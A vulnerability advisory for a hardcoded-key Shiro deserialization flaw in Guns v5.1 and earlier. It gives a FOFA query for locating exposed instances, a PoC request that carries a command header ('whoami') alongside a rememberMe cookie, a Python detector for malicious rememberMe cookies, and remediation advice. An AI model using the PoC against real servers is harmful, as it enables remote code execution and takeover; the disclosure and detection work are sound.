0x01 Product Overview
Guns is a modern Java application development framework built on the mainstream stack Spring Boot 2 + Vue3. Its core goal is to improve developer productivity and reduce the cost of building enterprise information systems.
0x02 Vulnerability Overview
Guns v5.1 and earlier versions contain a Shiro deserialization vulnerability. It stems from a hardcoded shiro-key shipped with the software: an attacker who knows this key can produce malicious serialized data that the server deserializes, leading to arbitrary code execution, execution of system commands, or injection of an in-memory webshell, and ultimately control of the server.
0x03 Affected Versions
Guns <= v5.1
0x04 Reproduction Environment
FOFA: app="Guns"
0x05 Reproduction
PoC
GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: rememberMe=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
X-Token-Data: whoami
Accept-Encoding: gzip
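The PoC above rides on the rememberMe cookie, which Shiro decrypts with the configured key and then deserializes. The following is an added detection example written for this advisory; it is not code from Guns, Apache Shiro, or the PoC author. It parses raw HTTP requests and flags rememberMe cookies that are far larger than a legitimate encrypted principal (the 1024-byte threshold is an assumption), cookies that decode to a raw Java serialization stream instead of ciphertext, malformed cookie values, and the PoC-specific X-Token-Data header. All sample requests are constructed inline.

```python
"""Heuristic detection of Shiro rememberMe deserialization attempts in HTTP requests.

Added example for this advisory; not part of Guns or Apache Shiro. The threshold and the
sample requests below are constructed assumptions, not values taken from the project.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Assumption: a legitimate Shiro rememberMe cookie holds an AES-encrypted serialized
# principal of a few hundred bytes; gadget-chain payloads typically run to kilobytes.
MAX_LEGIT_REMEMBERME_BYTES = 1024
# Magic bytes of a Java serialization stream; a correctly encrypted cookie never starts with these.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
# Header this advisory's PoC uses to carry the command; the name is specific to the PoC.
SUSPICIOUS_HEADERS = ("x-token-data",)

_COOKIE_RE = re.compile(r"(?:^|;\s*)rememberMe=([^;\s]+)")


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Return lower-cased header name -> value for a raw HTTP request (headers only)."""
    headers: Dict[str, str] = {}
    for line in raw_request.split("\r\n")[1:]:  # skip the request line
        if not line or ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def extract_rememberme(cookie_header: Optional[str]) -> Optional[str]:
    """Pull the rememberMe value out of a Cookie header, or None if absent."""
    match = _COOKIE_RE.search(cookie_header or "")
    return match.group(1) if match else None


def analyse_request(raw_request: str) -> List[str]:
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    findings: List[str] = []
    headers = parse_headers(raw_request)
    for name in SUSPICIOUS_HEADERS:
        if name in headers:
            findings.append(f"unexpected header {name}")
    token = extract_rememberme(headers.get("cookie"))
    if token is None or token == "deleteMe":
        return findings  # Shiro sets rememberMe=deleteMe when clearing the cookie
    try:
        payload = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        findings.append("rememberMe is not valid base64")
        return findings
    if len(payload) > MAX_LEGIT_REMEMBERME_BYTES:
        findings.append(f"oversized rememberMe payload ({len(payload)} bytes)")
    if payload.startswith(JAVA_SERIAL_MAGIC):
        findings.append("rememberMe carries unencrypted Java serialization stream")
    return findings


def _request(cookie_value: str, extra_headers: Optional[Dict[str, str]] = None) -> str:
    """Build a constructed raw request mirroring the PoC shape (GET / with a Cookie header)."""
    lines = ["GET / HTTP/1.1", "Host: target.internal",
             f"Cookie: JSESSIONID=abc123; rememberMe={cookie_value}"]
    for key, value in (extra_headers or {}).items():
        lines.append(f"{key}: {value}")
    return "\r\n".join(lines) + "\r\n\r\n"


def sample_requests() -> Dict[str, str]:
    """Constructed sample traffic (not real captures) covering each detection path."""
    return {
        "legit": _request(base64.b64encode(bytes(range(128))).decode()),
        "logout": _request("deleteMe"),
        "poc_shape": _request(base64.b64encode(b"A" * 4096).decode(),
                              {"X-Token-Data": "whoami"}),
        "plaintext_serial": _request(
            base64.b64encode(JAVA_SERIAL_MAGIC + b"\x73\x72" + b"\x00" * 20).decode()),
        "malformed": _request("not*base64!"),
    }


if __name__ == "__main__":
    for label, raw in sample_requests().items():
        print(f"{label}: {analyse_request(raw) or 'clean'}")
```

The size heuristic alone will not catch a compact payload, so treat it as one signal among several; the definitive fix is replacing the hardcoded key, after which forged cookies simply fail to decrypt and the check becomes a monitoring aid for attempts.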
0x06 Remediation
The vendor has fixed this vulnerability; users should contact the vendor to obtain the fix: https://gitee.com/stylefeng/guns
Configure access policies on firewalls or other security devices and restrict access to an allowlist.
Unless necessary, do not expose the system to the public internet.